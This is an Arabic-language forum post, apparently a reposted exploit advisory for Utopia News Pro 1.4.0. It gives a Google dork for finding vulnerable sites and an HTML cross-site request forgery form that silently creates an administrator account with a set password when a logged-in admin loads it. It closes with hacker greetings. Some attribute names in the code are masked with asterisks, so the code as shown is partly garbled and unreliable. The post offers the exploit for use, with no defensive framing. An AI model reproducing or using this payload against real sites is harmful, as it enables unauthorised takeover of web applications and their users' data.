بسم الله الرحمن الرحيم.
السلام عليكم ورحمه الله وبركاته.
كود:
# Exploit Title: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
# Date: 7/4/2012
# Author: Dr.NaNo
# Software Link: http://www.utopiasoftware.net/newspro/dl.php?file****=newspro140b.zip&mirror=1
# Version: 1.4.0
# Tested on: Linux-Red-Hat
# Google Dork: Powered By Utopia News Pro 1.4.0
#
########################################################
# ~ Exploit ~ #
########################################################
<html>
<****>
<form action="http://localhost/{PATh}/upload/users.php" method="post" />
<input type="hidden" ****="user****" value="NANO" />
<input type="hidden" ****="groupid" value="1" />
<input type="hidden" ****="password" value="102030" />
<input type="hidden" ****="password2" value="102030" />
<input type="hidden" ****="email" value="security@security.com" />
<input type="submit" ****="submitnew" accesskey="s" value="ThankS !" />
</form>
</****>
</html>
#### ~ Greetz ~ #########################################################
# #
# Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020 #
# #
# JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng #
# #
############################################### ~ All FriendS ~ #########
.More
Utopia News Pro 1>4>0 <= CSRF Add Admin Vulnerability